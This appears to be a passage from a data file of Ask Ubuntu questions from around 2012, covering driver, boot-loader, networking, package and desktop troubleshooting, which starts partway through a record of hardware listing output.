processor function 1 [ 1022:1701 ] 00:18.2 host bridge [ 0600 ] : advanced micro devices [ amd ] family 12h/14h processor function 2 [ 1022:1702 ] 00:18.3 host bridge [ 0600 ] : advanced micro devices [ amd ] family 12h/14h processor function 3 [ 1022:1703 ] 00:18.4 host bridge [ 0600 ] : advanced micro devices [ amd ] family 12h/14h processor function 4 [ 1022:1704 ] 00:18.5 host bridge [ 0600 ] : advanced micro devices [ amd ] family 12h/14h processor function 6 [ 1022:1718 ] 00:18.6 host bridge [ 0600 ] : advanced micro devices [ amd ] family 12h/14h processor function 5 [ 1022:1716 ] 00:18.7 host bridge [ 0600 ] : advanced micro devices [ amd ] family 12h/14h processor function 7 [ 1022:1719 ] 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) 05:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 )
154379	kile 2.1.2 in ubuntu 11.10	i read that kile was upgraded to version 2.1.2 which might have a live preview feature included . so i wanted to install it on ubuntu 11.10 but i do n't seem to have much luck . i added the ppa for kile/stable but it does n't work . this is what i get after sudo apt-get update : w : failed to fetch http : //ppa.launchpad.net/kile/stable/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/kile/stable/ubuntu/dists/oneiric/main/binary-amd64/packages 404 not found and a similar one for binary 386 i ca n't post because i am a new user and i can only have 2 hyper links . is there a way to install the newest version of kile in ubuntu 11.10 ? i would like to avoid installing ubuntu 12.04 since i had some bad experiences with this new version . cheers , lucian
154380	12.04 critical error when opening windows games	i am new to linux . running on an amd 170ghz processor ( nx2100 ? ) , 80 gb hd and 512mb memory with geforce fx5200 video card ( ca n't find linux driver for it ) . have loaded ( w/playonlinux & wine ) age of empires i and sid meier 's pirates and crown and cutlass . when i select open or play it says : the program empires.exe has encountered a serious problem and needs to close c & c wo n't even come up . same error for pirates . what have i done wrong ? as a matter-of-fact i ca n't play any downloaded/installed games except what came with 12.04 . keep in mind , i know nothing about code or sudo stuff unless it is spelled out . any help at all ?
154382	detect ubuntu using perl	i am working on a perl script that must write configuration file . i need to know if the script is running on ubuntu to set some ubuntu-specific values ( basically , disable the unified bar ) . the script can not require any perl packages that may not be present on user system . how can i check if the system is ubuntu or some other linux distro ?
154386	how to add windows to an ubuntu-application with quickly ?	i 'm doing a little app with quickly and i want to add some windows with different widgets , but the ubuntu-application template just have the options to add a dialog , an indicator , a help-guide and a help-topic . i know it is possible to do so writing the window code directly into the source code , but that way is a little inconsistent with the actual code structure provided by quickly . so , i want to know if is possible to add a new window with the existing ubuntu-application template or i have to do it by hand ? .
154387	my computer freezes when nvidia drivers activated	i 'm talking about the ubuntu recommended drivers at additional drivers in system settings . its sad and frustrating . i have a geforce 7300 le with ubuntu 12.04 . any solution to this ?
154388	resetting network adapter ?	i 'm running ubuntu 12.04 . i get a strong wireless signal throughout my house , and the wireless symbol in the upper-right-hand corner shows that it 's connected . the problem is , occasionally i am unable to access the internet ( still having a strong symbol ) . this happened with windows 7 , too , but running the network troubleshooter fixed it each time . it claimed to be `` resetting the network adapter '' . so , what i need to know is : how do i replicate that process on ubuntu ? thanks for your help !
154389	how does dhclient get called under 12.04	in my 12.04 precise install , when i boot the system , or when i plug in an ethernet cable , dhclient is n't run automatically on my wired eth0 connection . i have no running dhclient daemon . when i run dhclient manually it succeeds at pulling an address and configuring eth0 and the route table . it does output the following however : jdoe @ example : ~ $ sudo dhclient eth0 rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service smbd reload since the script you are attempting to invoke has been converted to an upstart job , you may also use the reload ( 8 ) utility , e.g . reload smbd which indicates that it 's an upstart managed thing . there are no upstart scripts in /etc/init/ for dhclient . i 'm running isc-dhcp-client version 4.1.esv-r4-0ubuntu5.1 , the current stable release . should dhclient be running all the time as a daemon on a standard 12.04 desktop install ? is dhclient supposed to be launched during machine boot via upstart as the curious message i get when running dhclient suggests ? should i have one of these ifplugd or netplug packages to launch dhclient when a cable is plugged into eth0 ? is dhclient instantiated by networkmanager perhaps and not running at all times ? for a standard ubuntu 12.04 install should networkmanager have anything listed in the `` wired '' tab of the network connections dialog ? [ example screenshot ] i 've both created a wired connection profile and left it blank , neither affects dhclient being run other symptoms that i 'm experiencing for context are : networkmanager does n't gracefully manage when the wired and wireless connections are both connected , it merely uses the wireless networkmanager does n't connect the vpn i have configured and sometimes try to use , over the wired network , it will only connect it over the wireless network . @ roadmr had asked for the content of /etc/network/interfaces : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 # networkmanager # iface eth0 inet dhcp # this is an autoconfigured ipv6 interface iface eth0 inet6 auto
154397	chrome crashes ubuntu	12.04 . soon after i start google chrome stable version , it crashes ubuntu -- whole system goes back to logout screen . i 've tried uninstalling and reinstalling google-chrome-stable , beta , and chromium . tried deleting ./config/google-chrome . no luck . firefox works fine . how to
154399	root directory of the kernel	a newbie here . i am trying to set up eclipse for linux kernel programming . the guide says set the project location as the root directory of the kernel . where 's the root directory of the kernel now ? according to linux file hierarchy system , it lists /lib as the root directory for shared libraries and kernel modules . i also see /lib32 and /lib64 . however , i tried selecting /lib as the location and eclipse does n't allow me to create the project .
154402	install gcc on ubuntu 12.04 lts	when i try to install gcc on ubuntu 12.04 lts server with apt-get install gcc , i get the following error : the following packages have unmet dependencies : gcc : depends : cpp ( > = 4:4.6.1-2ubuntu5 ) but it is not going to be installed depends : gcc-4.6 ( > = 4.6.1-1 ) but it is not going to be installed recommends : libc6-dev but it is not going to be installed or libc-dev when i delve deeper ( i.e . try to apt-get install gcc-4.6 ) , i get : gcc-4.6 : depends : gcc-4.6-base ( = 4.6.1-9ubuntu3 ) but 4.6.3-1ubuntu5 is to be installed depends : cpp-4.6 ( = 4.6.1-9ubuntu3 ) but it is not going to be installed depends : libgomp1 ( > = 4.6.1-9ubuntu3 ) but it is not going to be installed depends : libquadmath0 ( > = 4.6.1-9ubuntu3 ) but it is not going to be installed recommends : libc6-dev ( > = 2.13-0ubuntu6 ) but it is not going to be installed so when i try to install gcc-4.6=4.6.1-9ubuntu3 i get a list of 366 packages to remove ( including e.g . apt ) . which is craziness . this is an essentially vanilla installation of ubuntu 12.04 lts server ( i.e . i installed nginx , python-flup , python-yaml , rsync , python-pkg-resources , lsof , fontconfig , iptables , ufw , scons , and grc ) . it is very surprising to me that i can not install gcc , so i am somewhat confused as to why attempting to install gcc fails . the only apparent fix would seem to be uninstalling 366 packages , many of which are central to the operation of ubuntu . something does n't add up , and i would be very grateful for assistance . edit the above is with the latest packages of course , having used apt-get update ; apt-get upgrade before attempting the above . sorry , i should have mentioned that .
154409	i just recursively chmod 'd everything under / to 750 . any tips ?	i wo n't be the first and i wo n't be the last , i suppose . while playing around with the find command , i made a whoops and it would appear that instead of changing the permissions of the ~/web directory to 750 , it changed the permissions of the entire filesystem ( / ) to 750 , however i 'm not certain , but any attempt to investigate is thwarted by permission denied messages . for everything . this was the offending command : sudo find ~/web . type d -exec chmod 750 { } if i 'm not mistaken , the ubuntu team disabled root logins as a safety precaution so i 'm out of ideas . i 'm ( obviously ) a total newbie when it comes to file permissions so i was wondering if anyone had some good or even some bad advice to share . i 've mentally prepped myself to losing everything on the computer which is only of mild consequence , since i have backups , but i did do a bit of work on this box over the week and it would be a shame to lose it all due to a boneheaded mistake . if you are reading this message , ask yourself , have you backed up any of your work recently ? thanks in advance for any insights . feel free to scold me for using sudo carelessly
154411	quickly application making it run on startup	i have a pygtk application that i made using quickly , and i would like to have it run on startup when installed . how would i go about doing this ? i 'm not sure if sticking the .desktop file in ~/.config/autostart/ would make it work or not . if that will fix it , i do n't know how to add it to that folder since quickly packages the project for you and has it 's own installation script . is it possible to modify what it does on installation ? if possible , i would also like to add the program in the system settings personal tab , but i do not know how to do that .
154414	where is 'open in terminal ' ?	i 'm trying to figure out where is 'open in terminal ' when right clicking inside a folder ? last time i used it was in ubuntu 10.10 and since upgrading have no luck with it . i gave up on unity and using gnome but still ca n't find it .
154417	configuring permissions with bastille	i was using bastille to improve the security of my os . to set this software properly , it ask you several questions related to security rules and you respond it ( y-n ) . i 'm stuck at this question that i do n't know if i should answer for yes or not . my users : when i installed ubuntu i had create the a user ( admin ) , then i was able to create another user , b ( standard ) . questions : the effects of this option will affect the two users ( a & b ) or just to b ? the user a there i 'm using is the admin but not the root , right ? what are the differences ( in terms of permissions ) between the user a ( admin ) and the user b ( standard ) ?
154418	file loss after change language	i loss my files in my document , music , picture , download folders after change the language in my user account from english to my native language . how can i get my files back ? thank you .
154421	connect to xbox using windows media center	is there any software available for ubuntu that can emulate windows media center for connecting a computer to an xbox ? i tried following the xbox wizard , but it says that i need windows . i just want to be able to choose to show pictures , play music or video on my tv through my xbox instead of my computer . i can currently do something similar using my samsung phone and wireless tv using allshare . i just choose which video i want to play and where and it works like magic . the tv my xbox is connected to though does n't have wireless so i was hoping to use the xbox for similar functionality . thanks
154425	kvm image file portability	i have created some kvm virtual machines , each running ubuntu 11.10 and using 1 cpu and 1024mb of ram . i wonder how portables are those images . i mean if i copy the image files to another computer ( with different hardware than the original host ) will they work ?
154427	12.04 update crash , now can not boot	boot now freezes the system at the `` ubuntu purple screen '' with the 5 dots under it . i can not even ctrl-alt-f1 to get to an alternate console . have to push reset button on computer to reboot . after the 12.04 update crash , the system would boot , but i had no icons and no launch bar and errors about missing dependencies . ctrl-alt-f1 and ran apt-get -f install and it appeared to get the missing packages . i followed with a apt-get update ; apt-get upgrade . it appeared to install all of the remaining 12.04 update packages . rebooted to same blank screen - no icons , but got a compiz error . in console i tried `` unity -- reset '' rebooted ... nothing ... it 's dead in the water . tried to boot into recovery mode - black screen - i can not even ctrl-alt-del - have to push reboot button . fortunately , i have mint on another partition and i can access the broken 12.04 partition . ideas ? i can back up all of my folders using mint , but i would hate to have to do a new install .
154428	cheese launches but webcam area is black	command-line 12.04 cheese ( cheese:4144 ) : gtk-warning ** : attempting to add a widget with type gtkimage to a gtktogglebutton , but as a gtkbin subclass a gtktogglebutton can only contain one widget at a time ; it already contains a widget of type gtklabel is there a fix so that cheese will work in ubuntu 12.04 ? the program comes up but the webcam area is black . i am running unity 2d on a t42 thinkpad . all programs similar to cheese recognize my webcam as does skype , but i really like cheese and the error message may be ominous for other software failures .
154429	update grub to reflect changed partition location	i currently have 3 partitions : windows , ubuntu , and swap . i want to move my windows partition by about 20gb . when i try to do this in gparted , it tells me that this will mess up grub , and that there is a page that can resolve these issues . however , this page does not actually mention my issue . i am not moving my boot partition ( ubuntu ) . how can i force grub to look for operating systems that are on the drive ? i know that this is possible , because when ubuntu was installed it found windows without any issues . additionally , if i create a copy of a partition , how can i add that to grub ( i assume it will be the same command as above , but if not , what would it be ) ? note : os prober is mentioned here but it doest not list how to use it , or where to find it .
154430	kubuntu 12.04 : change login screen background ?	i am having trouble changing my login screen background . i can select the default wallpaper , the kde-default one , but whenever i select my own custom wallpaper , there is no image , just a solid color . normally , i would just ignore it , but the thing that bugs me is that this is a fresh install of kubuntu 12.04 64bit , and the os before this one , the one which i overwrote , had no trouble using the exact same image as the background . settings in the system settings application , login screen settings , background tab , enable background , under `` background '' , selected picture , under options , selected position : scaled . colors : single color . blending : no blending .
154431	how do i delete multiple lines in nano without affecting the clipboard ?	i can select all file by going to the 1st line alt+\ , start marking the text by alt+a , go to the last line by alt+/ but there , i do n't know which key to remove the selected text . hit delete does n't work for me but ctrl+k to cut the text will destroy my clipboard . so , what is the hotkey to delete selected text ?
154434	how to make unity unresponsive ?	recently i wanted to test a keyboard shortcut , which is supposed to kill x server ( hence very useful when you have a crash ) . that shortcut is not dependent on any particular window manager ( like lxde , unity , kwin etc ) . so , it must work , even when you have unresponsive ( to keybings ) window manager ( as opposed to alt+ctrl+backspace which kills the session , and bring you a login screen ) . that 's why i interested to make my window manager ( unity ) unresponsive . is past , it was very easy . opening a terminal , typing unity -- replace and then force close the terminal , was the simplest procedure . but unfortunately , this is not true in ubuntu 12.04 , ( they make it very robust ) because whenever i kill the terminal , unity automagically restart itself . i also tried compiz -- replace but was n't successful . my question is : how can i make unity unresponsive to any keyboard shortcuts ( of it 's keybindings ) while i am in unity session , so that i can test the global shortcut .
154440	cpu fan always working and the air is hot	my laptop is a dell n5110 , i3 , two video cards : intel hd3000 and nvidia gt323m . recently i installed ubuntu 12.04 . after i login in the system , the fan starts working non-stop , the fan air is hot and the noise is disturbing . what can i do to get the system working like when i am running windows 7 , to get it quiet and cooler ?
154443	how do i remotely shut down a virtual machine ( over ssh ) ?	i have some kvm virtual machines running ubuntu 11.10 . using the gui of the virtual machines i can turn them off as you would normally do it on ubuntu . however , i prefer to work on the vms using ssh from the host ( which also runs ubuntu 11.10 ) , and when trying to shutdown a vm with shutdown 0 it simply does not work . any suggestions ?
154449	what reverse engineering tools are available for ubuntu ?	i would like to know , what are different reverse engineering tools , that work on linux . i was using ollydebug on windows .
154460	why do apt-get and wget fail on my server when ping is working ?	yesterday my server still ok , but today after try to sudo apt-get update i got this error : update process . i try : sudo rm /var/lib/apt/lists/* -vf and got this.then try update again , but it 's not solving my problem then show may be still same error . i checked my internet connection try ping google.com , get result : ping google.com ( 74.125.235.40 ) 56 ( 84 ) bytes of data . from 136.198.117.254 : icmp_seq=1 redirect network ( new nexthop : fw1.jvc-jein.co.id ( 136.198.117.6 ) ) 64 bytes from sin01s05-in-f8.1e100.net ( 74.125.235.40 ) : icmp_req=1 ttl=53 time=20.6 ms 64 bytes from sin01s05-in-f8.1e100.net ( 74.125.235.40 ) : icmp_req=2 ttl=53 time=18.2 ms 64 bytes from sin01s05-in-f8.1e100.net ( 74.125.235.40 ) : icmp_req=3 ttl=53 time=33.0 ms 64 bytes from sin01s05-in-f8.1e100.net ( 74.125.235.40 ) : icmp_req=4 ttl=53 time=30.0 ms 64 bytes from sin01s05-in-f8.1e100.net ( 74.125.235.40 ) : icmp_req=5 ttl=53 time=28.1 ms in some sites said that may be it caused by getdeb server is down . try to install : jeinqa @ svrqar : ~ $ sudo apt-get install pastebinit reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_restricted_binary-amd64_packages e : the package lists or status file could not be parsed or opened . try : sudo ufw status verbose result : status : inactive
154462	how do i access the terminal without logging in to the desktop ?	using this guide to install oracle java i accidentally restarted on step 10 and now i ca n't get past the login screen . i 'm wondering if there is a way to access terminal without logging in and finish the last 4 steps ? after i try to sign in it takes me right back to the sign in screen .
154464	how do i access files from one ubuntu partition on another	a terminal error occured on my computer and i found myself unable to log in to ubuntu . to remedy this , i decided to simply install it again on a partition and then access my saved files on the old partition from the new one , thereby losing only my software and settings . the problem is , i do not know how to retrieve those old files . there is an icon called `` 90 gb filesystem '' in nautilus : it has 21 folders which hold which have exactly 1.7 gb of free space each and only system files in them . the question here is : are my old saved files retrievable ? are they retrievable through `` 90 gb filesystem '' or some other means ?
154466	why are my usb 2.0 ports stuck in low-speed 1.0 mode ?	my usb ports are stuck in 1.0 mode , i cant get them to work in 2.0 mode to get my devices to work . i tried a fresh install and rebootng many times , the mouse is slow and jumpy and transfers take a while .
154470	setting up a network printer	i have a canon mp970 printer and i want to setup network printing and scanning on my laptop . i got it set up on my desktop ( running windows 8 release preview x64 ) . how do i start ?
154474	what are the '~ ' files created when i edit something and can i delete them ?	i 've noticed that every time i edit or in anyway modify a .txt , .php , .html , .doc etc file , after i save it , an extra file gets created that has the same name as the original file except that it has an extra '~ ' after its extension . for example : 'index.html~ ' , 'name.php~ ' what are these extra files ? is it safe to delete them ? is it possible to stop them from appearing at all ?
154475	jdownloader 'server busy ' -- is there a problem with my installation ?	i recently reformatted my laptop to use 12.04 64-bit so i had to install everything again . when i installed jdownloader ( via terminal , ppa ) , i 'm always stuck with this 'server busy ' message ( please see attached image ) . i never had this problem when i installed it a week ago before i switched to 64-bit ( i was using 32-bit then ) . i 'm wondering if there is a problem with my installation that 's keeping me from downloading from the server ? or is this solely a jdownloader server problem ? before jdownloader closes , it prompts me to download/update from the website however i 'm really not familiar with how this instruction ( see below ) works . my linux skills are on beginner level only . try out our new install/start-script for linux/mac ! wget must be installed on system ! download jd.sh chmod +x jd.sh start jd.sh note : open jd.sh to read manual or change settings ! i hope someone could help me . : (
154478	if a ppa application crashes unity on exit , do i file a bug against the app or unity ?	every time i close darktable 1.0.4 in ubuntu 12.04 , unity crashes , and then restarts . my question is , since darktable has been installed via ppa , would i report the bug to the unity team or the application team ? i understand this may be too localised , but am struggling to find an answer to this one .
154480	internet connection problem in ubuntu 12.04- pppoeconf	i have installed ubuntu 12.04 on my machine . previously , i had installed ubuntu 11.04 , which was connected to internet ( dsl ) using the following command : sudo pppoeconf after completing the above in 11.04 , i was able to connect to the internet . but in ubuntu 12.04 , i am not able to connect to internet using that same command . what do i need to do to connect to the internet now ?
154481	how do i create a psuedo-domain through bind on ubuntu 12.04 ?	i 've done some prerequisite reading on dns and bind via o'reilly 's book . my goal is to have a local dns server ( i.e . seldon.foundation ) that resolves local names ( i.e . *.foundation ) but forwards the rest to opendns or google . my zone file is here : http : //pastebin.com/ryt66xgg my named.conf.local is here : http : //pastebin.com/zytuafpf after i restart bind with : sudo service bind9 restart i know it loads the files ( and loads them without error ) because i check syslog . but when i do a dig seldon.foundation i do n't get the expected result . resolv.conf has two ip addresses but there 's a note in the file saying not to edit the file by hand . what do i do now ?
154483	after installing mainline kernel 3.4.3 , why ca n't i build the amd graphics binary module ?	i recently updated my ubuntu 12.04 kernel to 3.4.3-generic , and now my ati/amd drivers will not install correctly . amd catalyst control center is there , and i can open it fine , but it only shows 2d graphics as being enabled . my graphics card is the radeon hd 7770 , and was working completely fine on my older kernel ( 2.5.xx ) . i get the following output when attempting to install the latest drivers from amd ( the error is a little more than half way through it ) : selecting previously unselected package fglrx . ( reading database ... 261454 files and directories currently installed . ) unpacking fglrx ( from fglrx_8.961-0ubuntu1_amd64.deb ) ... restore of system environment completed error ! there are no instances of module : fglrx 8.961 located in the dkms tree . errors during dkms module removal uninstall fglrx driver complete . for detailed log of uninstall , please see /etc/ati/fglrx-uninstall.log system must be rebooted to avoid system instability and potential data loss . selecting previously unselected package fglrx-amdcccle . unpacking fglrx-amdcccle ( from fglrx-amdcccle_8.961-0ubuntu1_amd64.deb ) ... selecting previously unselected package fglrx-dev . unpacking fglrx-dev ( from fglrx-dev_8.961-0ubuntu1_amd64.deb ) ... setting up fglrx ( 2:8.961-0ubuntu1 ) ... update-alternatives : using /usr/lib/fglrx/ld.so.conf to provide /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf ( x86_64-linux-gnu_gl_conf ) in auto mode . update-alternatives : warning : skip creation of /etc/opencl/vendors/amdocl32.icd because associated file /usr/lib/fglrx/etc/opencl/vendors/amdocl32.icd ( of link group x86_64-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : forcing reinstallation of alternative /usr/lib/fglrx/ld.so.conf because link group x86_64-linux-gnu_gl_conf is broken . update-alternatives : warning : skip creation of /etc/opencl/vendors/amdocl32.icd because associated file /usr/lib/fglrx/etc/opencl/vendors/amdocl32.icd ( of link group x86_64-linux-gnu_gl_conf ) does n't exist . update-alternatives : using /usr/lib/fglrx/alt_ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode . update-initramfs : deferring update ( trigger activated ) loading new fglrx-8.961 dkms files ... first installation : checking all kernels ... building only for 3.4.3-030403-generic building for architecture x86_64 building initial module for 3.4.3-030403-generic error ( dkms apport ) : kernel package linux-headers-3.4.3-030403-generic is not supported error ! bad return status for module build on kernel : 3.4.3-030403-generic ( x86_64 ) consult /var/lib/dkms/fglrx/8.961/build/make.log for more information . update-initramfs : deferring update ( trigger activated ) processing triggers for ureadahead ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... setting up fglrx-amdcccle ( 2:8.961-0ubuntu1 ) ... setting up fglrx-dev ( 2:8.961-0ubuntu1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.4.3-030403-generic running fglrxinfo in the command line returns the following : x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 138 ( atifglextension ) minor opcode of failed request : 66 ( ) serial number of failed request : 13 current serial number in output stream : 13 basically , it looks like the installer is failing when attempting to build for kernel 3.4.3 ... is there anything i can do about this , or do i have to wait for amd to release updated drivers ? lastly , here is the output recorded in /var/lib/dkms/fglrx/8.961/build/make.log : dkms make.log for fglrx-8.961 for kernel 3.4.3-030403-generic ( x86_64 ) tue jun 19 23:40:17 cdt 2012 amd kernel module generator version 2.1 doing makefile based build for kernel 2.6.x and higher rm -rf *.c *.h *.o *.ko *.a . ? ? * *.symvers make -c /lib/modules/3.4.3-030403-generic/build subdirs=/var/lib/dkms/fglrx/8.961/build/2.6.x modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.4.3-030403-generic' cc [ m ] /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.o /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c : in function ‘kasinitexecutionlevels’ : /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c:4157:5 : error : ‘cpu_possible_map’ undeclared ( first use in this function ) /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c:4157:5 : note : each undeclared identifier is reported only once for each function it appears in /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c:4157:5 : warning : left-hand operand of comma expression has no effect [ -wunused-value ] make [ 2 ] : *** [ /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.o ] error 1 make [ 1 ] : *** [ _module_/var/lib/dkms/fglrx/8.961/build/2.6.x ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.4.3-030403-generic' make : *** [ kmod_build ] error 2 build failed with return value 2 anyone know what if there is anything that i can do ? thanks in advance !
154485	mounting an external usb drive via virtualbox ?	i have an external hard drive that windows ca n't open ( gives an error message saying the file system is unrecognized and wants me to reformat ) , so i am trying to see if ubuntu , which i am running as a guest vm in virtualbox on my win 7 host , can open it . i am confused as to how to mount it . when i open up virtualbox and click `` settings '' for the ubuntu vm , do i go to `` storage '' and try to see if i can mount it there , or do i go down to `` usb '' and attempt to mount it from there ? when i tried the latter , and clicked on `` enable usb 2.0 ( ehci ) controller '' , a warning popped up from vb saying i needed to download vbox extensions to be able to select that option . so i downloaded the extensions and am unsure of what to do next . when i get into ubuntu , how can i access the external hard drive via the command line ? when i tried the command `` fdisk -l '' , the following is printed : http : //paste.ubuntu.com/1053741/ but i have not done anything else in the vbox settings , so i do n't think any of those hard drives listed are referring to the external usb drive that i want to access ( even though the drive is plugged into my laptop ) . i do not know what drives sda1 , sda2 , and sda5 refer to exactly , but apparently i have an extended partition since it goes from sda1 and sda2 to sda5 . when i created space for the ubuntu virtual machine through vbox , i think i only created one main partition and one for the swap , so why is fdisk showing me 3 partitions , unless one of them is referring to the plugged in usb external hard drive , but i do n't think that is it because i have not done anything else in the vbox settings for usb ? any suggestions will be appreciated : - ) . i have a western digital external hd of around 2tb ; windows 7 for some reason no longer allows me to open it : when i plug it into my laptop ( via a usb 2.0 port ) , windows either does nothing or asks me to format the drive because it does n't recognize the file system . so i am trying to see if i can access the files in ubuntu . i am running ubuntu through virtualbox . before starting ubuntu , i went into the usb settings for the ubuntu virtual machine , and selected the external hard drive ( vbox sees it ) . then i started ubuntu . here is the print out of fdisk -l : disk /dev/sda : 91.3 gb , 91268055040 bytes 255 heads , 63 sectors/track , 11096 cylinders , total 178257920 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d5f79 device boot start end blocks id system /dev/sda1 * 2048 174583807 87290880 83 linux /dev/sda2 174585854 178255871 1835009 5 extended /dev/sda5 174585856 178255871 1835008 82 linux swap / solaris disk /dev/sdb : 2000.4 gb , 2000396746752 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907024896 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00020fc3 device boot start end blocks id system /dev/sdb1 * 2048 3907024895 1953511424 7 hpfs/ntfs/exfat i believe the external drive is the bottom one , sdb1 , but i have no idea how to access it . is it already mounted or do i have to mount it manually ? if windows 7 did not recognize it , will the same problem occur in ubuntu ?
154492	how to make ext3 converted to ext4 support e4defrag ?	i have two ext3 filesystems that are very old and have been 99 % full for a long time , leading to fragmentation . also , they 've been used for running vms with dynamic disk images and other fragmentation-causing workloads . i recently converted the filesystems to ext4 using the instructions here , specifically by running : # tune2fs -o extents , uninit_bg , dir_index /dev/dev # e2fsck -fdc0 /dev/dev however , the filesystems still do n't support e4defrag : failed to defrag with ext4_ioc_move_ext ioctl : operation not supported [ ng ] i 'm guessing the tune2fs command lacks some option , but googling did n't help me figure out what that might be .
154498	why has hibernation stopped working after moving my 12.04 install to a different laptop ?	i recently got a new laptop ( thinkpad x230 ) . i did n't really have time to do a fresh install so i copied my install ( xubuntu 12.04 ) over from my old machine ( thinkpad x61 ) . now when i try to hibernate it seems to do the hibernate step fine , but does n't seem to try and resume when booting back up . it just does a fresh boot . is there something i need to do so the system knows where to look for the hibernation data ? /var/log/boot.log : http : //paste.ubuntu.com/1056101/ dmesg : http : //paste.ubuntu.com/1056102/
154499	how does the install process guess the timezone ?	is it possible to use the same tool to have ubuntu guess what timezone it is currently in ? this article mentions the feature i 'm looking for ( just above the second pic ) : http : //www.linuxforu.com/2012/05/ubuntu-12-04-precise-pangolin-review/
154505	what simple offline gui database should i use for this application ?	i am looking an open source application . application should have : * database support ( create two or three table ) * gui ( what i have created should be seen ) example : assume that i have created a table ; x_table : | a | b | c | d | after creating table , i am loading data | a | b | c | d | | 1 | 11 | b | f | - | 3 | 12 | a | o | - data | 4 | 13 | r | o | - when i am opening application not for loading data , i want see data in graphical interface . one day , i want modify existing data . i can just clicking the place then add new data assume i want change 12 . i am clicking that position and then writing new data | a | b | c | d | | - | -- | - | - | - | 3 | 19 | a | o | - data | - | -- | - | - | - are there any open source application which have above feature ? application can be so simple , * no internet connection * support only one database * static table creation ( once created never changed ) application can be run ubuntu 12.04 and/or windows . in other words , i am wanting database viewer and editor . edit : i should load pdf file , image etc . or give path of the file to the application . this link can be reference to my question . ( interface should be like this , just a list )
154507	error message `` e : unable to locate package firmware-b43-installer ''	i am using an acer aspire 5002wlmi laptop and set up a dual boot with windows xp and ubuntu 12.04 . wi-fi is working well in windows xp , but when i start ubuntu i will get the below error . [ 95.514855 ] b43-phy0 error : you must go to http : //wireless.kernel.org/en/users/drivers/b43 # devicefirmware and download the correct firmware for this driver version . please carefully read all the instruction on this website . then i followed the instructions from the below link . file : ///c : /documents % 20and % 20settings/mgl/desktop/how % 20to % 20install % 20ubuntu/ubuntu % 2012.04 % 20splash % 20screen % 20lockup % 20with % 20livecd % 20_ % 20ben % 20rousch % 27s % 20cluster % 20of % 20bleep.htm but i am stuck in installing the broadcom wi-fi firmware in terminal , and it is showing this error : e : unable to locate package firmware-b43-installer how can i proceed ?
154510	sony vaio svt1311 brightness change does n't works	i bought the new ultrabook sony vaio svt1311 . many things work but brightness control does n't . i see the splash bubble ( that reacts to fn+f5 and fn+f6 ) but the brightness does n't change . it stays permanent at 100 % and i ca n't do anything with it . the graphics card is integrated intel hd3000 .
154513	after installing wubi to a different drive than windows , why is my bootloader gone ?	i used the windows installer of ubuntu 12.04 to download and install ubuntu . i remember installing ubuntu in different drive than that which contains windows-7 , it asked me to restart and when i did , the boot manager was missing . can anyone understand what could have happened here ? right now , its not booting any os .
154515	why does creating a new tab give me 'typeerror : expected gtk.widget , but got gobjectmeta ' ?	def on_btn_new_subject_activate ( self , widget ) : self.subjects.append_page ( gtk.textview ( ) , `` testing '' ) i am trying to create a new tab on a text area but i whenever the signal is called by the event ( i click the button ) , this happens : typeerror : expected gtk.widget , but got gobjectmeta i have also tried variations on this like `` gtk.gtktextview ( ) '' and `` gtktextview ( ) '' with no success what am i supposed to be using to get a text area in that tab ?
154519	what happens if my lcd desktop monitor is detected as a 'laptop ' ?	since i plugged in my new acer tft ubuntu 12.04 detects it as `` laptop '' . but it 's a acer s231hl . can you help me to fix this problem ?
154521	why did windows xp disappear from the menu on my triple-boot system ?	i have windows xp installed , followed by mint 12 and finally ubuntu 12.04 . i did a sudo grub-install /dev/sda followed by sudo update-grub . on rebooting all was fine and the boot menu had ubuntu 12.04 , mem , windows , and finally mint 12 . all was fine till now . today wanted to boot into windows but found wiindows xp missing from boot menu . tried sudo grub-install /dev/sda followed by sudo update-grub , but windows xp is not found . can someone help with what to do to restore windows xp in the boot menu , please ?
154526	12.04 display resolution changes after each reboot	i am running 12.04-64bit on a dell xps15z and the resolution changes after each reboot to 1024x768 .as a result my desktop occupies just 3/4 of my entire screen ... i have to manually adjust it through the display option to the max 1366x768 in order for the desktop to occupy the whole display ! if you add this to the `` system problem detected '' that pops up every day i can not hide my dissatisfaction and frustration about 12.04 ...
154533	how do i include the latest package updates in a customized livecd ?	using the ubuntu customization kit , is there a way to include all the updates on the created cd ( up to the point when the cd gets created ) ? thanks
